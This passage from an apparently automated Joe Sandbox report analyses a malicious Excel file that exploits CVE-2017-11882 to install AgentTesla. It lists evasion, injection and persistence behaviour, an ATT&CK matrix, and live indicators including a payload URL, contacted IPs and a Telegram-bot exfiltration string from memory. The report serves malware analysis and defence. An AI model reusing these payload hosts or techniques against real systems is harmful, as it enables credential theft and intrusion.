                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -59812s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -89673s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -89580s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060Thread sleep time: -59718s >= -30000s
                      Source: C:\Users\Public\name.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00408DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004059A0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00428C6C GetSystemInfo,
                      Source: C:\Users\Public\name.exeProcess information queried: ProcessInformation
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040ADB0 GetProcessHeap,HeapFree,
                      Source: C:\Users\Public\name.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeCode function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeCode function: 7_1_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\name.exeMemory written: C:\Users\Public\name.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory written: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: C:\Users\Public\name.exeProcess created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                      Source: name.exe, 00000007.00000002.2352405085.00000000008F0000.00000002.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2352283677.00000000009B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: name.exe, 00000007.00000002.2352405085.00000000008F0000.00000002.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2352283677.00000000009B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: name.exe, 00000007.00000002.2352405085.00000000008F0000.00000002.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2352283677.00000000009B0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\Public\name.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\Public\name.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\name.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\Public\name.exeCode function: 7_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004487E8 GetVersion,
                      Source: C:\Users\Public\name.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2354037538.0000000003406000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2352963258.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2354001963.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2353901074.00000000033B4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2352604798.0000000001EB2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.2339765119.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2215598384.0000000000338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2354068274.0000000003426000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Hqfadrv.exe PID: 2732, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1616, type: MEMORY
                      Source: Yara matchFile source: 7.2.name.exe.2140000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.2060000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.450000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.450000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.2060000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.name.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.name.exe.2140000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.name.exe.22e0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Hqfadrv.exe PID: 2732, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1616, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2354037538.0000000003406000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2352963258.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2354001963.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2353901074.00000000033B4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2352604798.0000000001EB2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.2339765119.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2215598384.0000000000338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2354068274.0000000003426000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Hqfadrv.exe PID: 2732, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: name.exe PID: 1616, type: MEMORY
                      Source: Yara matchFile source: 7.2.name.exe.2140000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.2060000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.450000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.450000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Hqfadrv.exe.2060000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.name.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.name.exe.2140000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.name.exe.22e0000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Application Shimming1Application Shimming1Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Registry Run Keys / Startup Folder1Process Injection112Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information31Security Account ManagerSystem Information Discovery128SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter2Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSSecurity Software Discovery26Distributed Component Object ModelClipboard Data3Scheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 323613 Sample: SpecificationX20202611.xlsx Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected AgentTesla 2->56 58 10 other signatures 2->58 8 EQNEDT32.EXE 11 2->8         started        13 Hqfadrv.exe 2->13         started        15 EXCEL.EXE 11 9 2->15         started        17 Hqfadrv.exe 2->17         started        process3 dnsIp4 42 khunnapap.com 128.199.253.44, 49165, 80 DIGITALOCEAN-ASNUS United Kingdom 8->42 32 C:\Users\user\AppData\Local\...\lxpo[1].exe, PE32 8->32 dropped 34 C:\Users\Public\name.exe, PE32 8->34 dropped 68 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->68 19 cmd.exe 8->19         started        44 fanosethiopiatours.com 13->44 46 discord.com 13->46 70 Detected unpacking (changes PE section rights) 13->70 72 Detected unpacking (overwrites its own PE header) 13->72 74 Machine Learning detection for dropped file 13->74 76 2 other signatures 13->76 21 Hqfadrv.exe 13->21         started        36 C:\Users\...\~$SpecificationX20202611.xlsx, data 15->36 dropped 48 fanosethiopiatours.com 17->48 50 discord.com 17->50 file5 signatures6 process7 process8 23 name.exe 1 2 19->23         started        dnsIp9 38 fanosethiopiatours.com 50.87.153.103, 49167, 49169, 49171 UNIFIEDLAYER-AS-1US United States 23->38 40 discord.com 162.159.136.232, 443, 49166, 49168 CLOUDFLARENETUS United States 23->40 30 C:\Users\user\AppData\Local\...\Hqfadrv.exe, PE32 23->30 dropped 60 Detected unpacking (changes PE section rights) 23->60 62 Detected unpacking (overwrites its own PE header) 23->62 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 23->64 66 3 other signatures 23->66 28 name.exe 2 23->28         started        file10 signatures11 process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SpecificationX20202611.xlsx62%VirustotalBrowse
                      SpecificationX20202611.xlsx53%ReversingLabsWin32.Exploit.CVE-2017-11882
                      SpecificationX20202611.xlsx100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe100%Joe Sandbox ML
                      C:\Users\Public\name.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe100%Joe Sandbox ML

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      10.2.Hqfadrv.exe.400000.2.unpack100%AviraHEUR/AGEN.1131223Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      khunnapap.com4%VirustotalBrowse
                      discord.com1%VirustotalBrowse
                      fanosethiopiatours.com3%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://fanosethiopiatours.com/components/com_messages/controllers/messages08/Hqfafff0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://rMSjwD.com0%Avira URL Cloudsafe
                      https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      khunnapap.com
                      		128.199.253.44
                      		truetrueunknown
                      discord.com
                      		162.159.136.232
                      		truefalseunknown
                      fanosethiopiatours.com
                      		50.87.153.103
                      		truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://fanosethiopiatours.com/components/com_messages/controllers/messages08/Hqfaffffalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSHqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.%s.comPAname.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmpfalse
                        		high
                        http://gorohov.narod.ru/index.htmSname.exe, 00000006.00000000.2145781433.0000000000401000.00000020.00020000.sdmp, name.exe, 00000007.00000000.2214244196.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 00000009.00000000.2236985625.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000A.00000000.2254253931.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.drfalse
                          		high
                          http://gorohov.narod.ru/index.htmHqfadrv.exe, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.drfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haname.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://rMSjwD.comHqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xname.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpfalse
                              		high
                              https://api.ipify.orgGETMozilla/5.0Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              50.87.153.103
                              		unknownUnited States
                              		46606UNIFIEDLAYER-AS-1USfalse
                              162.159.136.232
                              		unknownUnited States
                              		13335CLOUDFLARENETUSfalse
                              128.199.253.44
                              		unknownUnited Kingdom
                              		14061DIGITALOCEAN-ASNUStrue

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:323613
                              Start date:27.11.2020
                              Start time:08:25:51
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 8m 46s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:SpecificationX20202611.xlsx
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSX@12/5@11/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 81.9% (good quality ratio 79.4%)
                              • Quality average: 84.3%
                              • Quality standard deviation: 24.5%
                              HCA Information:
                              • Successful, ratio: 73%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:26:59API Interceptor675x Sleep call for process: EQNEDT32.EXE modified
                              08:27:08API Interceptor799x Sleep call for process: name.exe modified
                              08:27:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hqfa C:\Users\user\AppData\Local\afqH.url
                              08:27:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hqfa C:\Users\user\AppData\Local\afqH.url
                              08:27:51API Interceptor667x Sleep call for process: Hqfadrv.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              50.87.153.103http://word.eleganthayat.comGet hashmaliciousBrowse
                              • importantdocument.mymensingheducationboard.gov.bd/image/0.jpg?x=a5dbd4393ff6a725c7e62b61df7e72f0
                              162.159.136.232RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                tzjEwwwbqK.exeGet hashmaliciousBrowse
                                  New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                    USD67,884.08_Payment_Advise_9083008849.exeGet hashmaliciousBrowse
                                      USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                        NyUnwsFSCa.exeGet hashmaliciousBrowse
                                          PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                            D6vy84I7rJ.exeGet hashmaliciousBrowse
                                              LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                QgwtAnenic.exeGet hashmaliciousBrowse
                                                  qclepSi8m5.exeGet hashmaliciousBrowse
                                                    99GQMirv2r.exeGet hashmaliciousBrowse
                                                      7w6Yl263sM.exeGet hashmaliciousBrowse
                                                        8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                          187QadygQl.exeGet hashmaliciousBrowse
